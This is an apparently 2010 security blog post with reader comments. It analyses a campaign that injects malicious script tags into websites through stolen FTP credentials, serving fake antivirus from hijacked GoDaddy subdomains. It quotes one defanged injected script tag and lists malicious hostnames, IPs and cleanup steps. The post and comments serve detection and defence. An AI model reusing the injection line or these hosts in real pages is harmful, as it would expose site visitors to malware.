Loading site search ...

Malware on Hijacked Subdomains. Part 2.

17 Jun 10 Filed in Website exploits

About a month ago I wrote about a hacker attack that used hijacked subdomains of legitimate websites to serve malware (fake anti-virus software) off of them. Most likely cyber criminals used a phishing attack to steal credentials of GoDaddy’s domain management control panel and created rogue DNS records for some subdomains to make them point to hacker-controlled servers.

In that article I wondered if that was a new trend (usage of virtually free hijacked subdomains) or just temporary approach that wouldn’t be used anywhere else. Well, this week I came across a different malware attack that also uses hijacked subdomains of legitimate websites.

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

<sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube.js"></sc ript> 

The scripts reminds of many other attacks that used nginx reverse proxy on port 8080 on compromised servers (in this case this is true too).

Script names

I checked many infected sites and noticed that the injected scripts always used the same 5 subdomains and changed the file name part of the script from site to site. They always used Internet/computer related file names, e.g.: YouTube.js, Virtual_Reality.js, Backup.js, Unfriend.js, Keystroke.js, Access.js, Technology_Services.js, Page_View.js, Gigahertz.js, Telnet.js, Data_Type.js, Paste.js, Gnutella.js, Website.js, etc.

Hijacked subdomains

The 5 subdomains are (there may be more but I only seen these five):

oployau .fancountblogger .com
sorydory .russellhowe .com
aospfpgy .dogplaystation .com
kollinsoy .skyefenton .com
temp .hbsouthmomsclub .com

Update: You can find many more hijacked subdomains in comments.

Each of them points to different IPs on different networks. And none of the IPs matches the IP (or even network) of their second-level domains.

All the second-level domains have been registered and now managed via GoDaddy. Some of them point to real legitimate websites and others are just parked domains.

It’s clear that hackers somehow gained access to those domains’ DNS management panel and created rogue DNS records for subdomains that legitimate domain owners cannot even imagine exist.

oployau.fancountblogger.com. 937 IN A 78.137.161.186 sorydory.russellhowe.com. 3530 IN A 88.198.25.170 aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15 kollinsoy.skyefenton.com. 399 IN A 194.150.236.199 temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23

This is the second attack in a short time that uses this approach to get free domain names to use in malware distribution. I guess, it is still to early to call this a trend, but it’s definitely something that we should keep an eye on.

To domain owners

When was the last time you checked DNS records of your domains? Are you sure there are no rogue subdomains that criminals use behind your back? Probably it’s time to check your domain settings now. But don’t forget about phishing attacks – make sure you are logging into a genuine site of your registrar. (Check GoDaddy’s security tips)

To webmasters

If you found one of the above scripts in your web pages (you can use Unmask Parasites to detect them) do the following:

Scan your computer for malware.
When you are sure it is clean, change all site passwords.
Don’t save new passwords in FTP clients (unless they provide a master key encryption)
If possible, use only secure file transfer protocols (e.g. SFTP or FTPS). Plain FTP is very insecure.
Remove the malicious scripts from files on server. Note, the scripts may also be injected into .js files. Sometimes hackers even create malicious .js files on compromised servers. If you don’t want to miss any infected files, consider removing everything and then restoring the site from a clean backup copy.
If your site is blacklisted by Google, you need to request a malware review via Google Webmaster Tools (Diagnostics -> Malware). You can read more about it in my guide.

Have your say

Do you know any other malware attacks that use hijacked subdomains of legitimate websites? Can we call this a new trend?

Related posts:

If you need my help to resolve your site security issues, you can request it here.

Tags: DNS FTP GoDaddy password Phishing

Reader's Comments (8)

CS | 23 Jun 2010 3:09 pm
Here are two more domains which have been used in this attack

foxy.divarug .com
blog.bigsophieblog .com

As with the others, registration and DNS hosted by GoDaddy. While GoDaddy has a large percentage of the registration business and are a major DNS provider for low budget domains, the fact that ALL domains being used involve GoDaddy suggests that the hackers have discovered an exploit allowing them access to GoDaddy accounts (or have access to GoDaddy accounts through some other means).
Reply to this comment
- Denis | 23 Jun 2010 3:19 pm
  I’ve also found a new hijacked domain today:
  iopap.upperdarby26 .com
  
  And I still think that it was a phishing attack that helped criminals get access to certain domains’ DNS records. There are many known GoDaddy phishing attacks (mainly via email spam).
  
  If it was some exploitable security hole in GoDaddy’s domain management service, I’m afraid, we would have seed much more hijacked subdomains and altogether stolen domain names.
  Reply to this comment
Denis | 28 Jun 2010 9:58 am
I find new hijacked subdomains almost every day so I decided to post them here:

blog.locatejobs .org:8080/File.js
dodo.busop .info:8080/Emoticon.js
adoffy.alltuckedinathome .com:8080/LED.js
dolgo.lulucabana .com:8080/Data.js
soaoo.blog-salopes .com:8080/Access_Point.js
asol.vmtechsolutions .biz:8080/File.js
sokyoss.drelshazly .com:8080/E-commerce.js
questtore.hermosayasociados .com:8080/Base_Station.js
solk.seamscreative .info:8080/Undo.js
sfofotky.iexam .info:8080/ODBC.js
kolpo.gunterschaub .com:8080/Keywords.js
dolfy.sedonahyperbarics .com:8080/File.js
golaogp.islamicweightloss .com:8080/Real-Time.js
asoosp.acilalisveris .com:8080/OASIS.js
assol.metro-trading .net:8080/Link.js
blog.nodisposable .com:8080/URL.js
sogpaoiy.the-mlmpowercall .com/Zettabyte.js
Reply to this comment
Paul | 12 Jul 2010 2:30 pm
Hi Denis,

This seems to be part this injection

http://www.sophos.com/blogs/sophoslabs/?p=10417

pob
Reply to this comment
Maarten | 14 Jul 2010 8:20 am
It might be a trend, i also had an infected site with the same kind of scripts inserted, this one pointed to

hxxp://pantscow .ru:8080/OASIS.js

(no subdomain here!)

The infected site was not hosted by GoDaddy this time, but by a company named realhosting.nl. After changing the FTP password the site was infected again, so i guess someone found an exploit to gain access to their servers as well. I informed the hosting provider…
Reply to this comment
- Denis | 14 Jul 2010 3:35 pm
  They don’t resort to only hijacked subdomains. They also use their own domains (as they did before the subdomains).
  
  Again, each of them point to 5 different IPs where they set up reverse proxies
  
  pantscow .ru. 78 IN A 94.23.34.93 pantscow .ru. 78 IN A 87.98.136.164 pantscow .ru. 78 IN A 94.23.231.140 pantscow .ru. 78 IN A 94.23.240.219 pantscow .ru. 78 IN A 91.121.184.181
  
  hxxp://nuttypiano .com/LAN.js
  nuttypiano.com. 66 IN A 91.121.61.207 nuttypiano .com. 66 IN A 91.121.135.109 nuttypiano .com. 66 IN A 94.32.66.150 nuttypiano .com. 66 IN A 213.165.91.101 nuttypiano .com. 66 IN A 82.103.129.152
  
  hxxp://dullplane .ru/Webmaster.js
  dullplane .ru. 344 IN A 94.23.202.33 dullplane .ru. 344 IN A 216.66.78.137 dullplane .ru. 344 IN A 88.191.96.7 dullplane .ru. 344 IN A 88.208.234.222 dullplane .ru. 344 IN A 93.157.232.64
  
  hxxp://youngarea .ru/AGP.js
  youngarea .ru. 395 IN A 88.191.96.7 youngarea .ru. 395 IN A 88.208.234.222 youngarea .ru. 395 IN A 93.157.232.64 youngarea .ru. 395 IN A 94.23.202.33 youngarea .ru. 395 IN A 216.66.78.137
  
  hxxp://hugejar .com:8080/Bandwidth.js
  hxxp://trapbarf .ru/IM.js
  
  hxxp://shelfmurder .ru/QWERTY.js
  hxxp://cutboss .ru/RADCAB.js
  
  hxxp://riotassistance .ru/Template.js
  riotassistance.ru. 395 IN A 217.195.160.74 riotassistance .ru. 395 IN A 77.37.21.166 riotassistance .ru. 395 IN A 77.235.44.94 riotassistance .ru. 395 IN A 88.191.47.83 riotassistance .ru. 395 IN A 93.157.232.64
  
  hxxp://pocketbloke .ru/Tebibyte.js
  pocketbloke .ru. 344 IN A 77.235.44.94 pocketbloke .ru. 344 IN A 88.191.47.83 pocketbloke .ru. 344 IN A 93.157.232.64 pocketbloke .ru. 344 IN A 217.195.160.74 pocketbloke .ru. 344 IN A 77.37.21.166
  
  hxxp://hairyartist .ru/JPEG.js
  hairyartist .ru. 432 IN A 97.107.132.41 hairyartist .ru. 432 IN A 188.40.58.19 hairyartist .ru. 432 IN A 85.120.34.244 hairyartist .ru. 432 IN A 88.191.47.83 hairyartist .ru. 432 IN A 89.19.5.116
  
  hxxp://obscurewax .ru/Scroll_Wheel.js
  obscurewax .ru. 388 IN A 217.151.230.10 obscurewax .ru. 388 IN A 188.40.58.19 obscurewax .ru. 388 IN A 88.191.47.83 obscurewax .ru. 388 IN A 85.120.34.244 obscurewax .ru. 388 IN A 212.176.115.141
  
  Another variant: hxxp://roundstorm .com:8080/Megabyte.js
  roundstorm .com. 432 IN A 91.121.162.65 roundstorm .com. 432 IN A 194.24.228.81 roundstorm .com. 432 IN A 213.175.207.140 roundstorm .com. 432 IN A 62.212.132.226 roundstorm .com. 432 IN A 88.84.145.36
  
  serfinworld.com. 900 IN A 201.233.32.161 serfinworld.com. 900 IN A 71.205.41.75 serfinworld.com. 900 IN A 70.66.77.227 serfinworld.com. 900 IN A 173.30.189.230 serfinworld.com. 900 IN A 71.192.136.228
  
  profincorp.com. 900 IN A 71.192.136.228 profincorp.com. 900 IN A 70.66.77.227 profincorp.com. 900 IN A 173.30.189.230 profincorp.com. 900 IN A 201.233.32.161 profincorp.com. 900 IN A 71.205.41.75
  
  diseasednoodle.ru. 432 IN A 91.121.188.123 diseasednoodle.ru. 432 IN A 188.165.95.133 diseasednoodle.ru. 432 IN A 188.165.212.54 diseasednoodle.ru. 432 IN A 87.98.147.134 diseasednoodle.ru. 432 IN A 91.121.108.61
  Reply to this comment
StopBadware - Hijacked subdomains still serving malware | 26 Jul 2010 8:58 pm
[...] by Oliver Day Mon, 26 Jul 2010 20:43:41 GMT Last month the Unmask Parasites blog wrote about attacks using hijacked sudomains of legitimate websites to serve badware. At the [...]
Reply to this comment
jj-momscashblog | 02 Aug 2010 3:18 am
My blog has been hit with the “this site may be harmful if you are on it” so many times within the past months that I’ve lost track. Each time I go through the whole deal that is required of us to perform. This time however I had help with someone who knows more about tech-stuff than I do, and we found a correlation between HostGator vs. THEPLANET and the malware hit site. It seems that THEPLANET is a server for HG which in turns causes problems for anyone who has HG as their hosting co. Do you know any info. regarding this,we went to StopBadware.org and found out about this relationship. I would appreciate it if you could explain it in an easy way for some of us to wrap our heads around. Thanks so much, JJ
Reply to this comment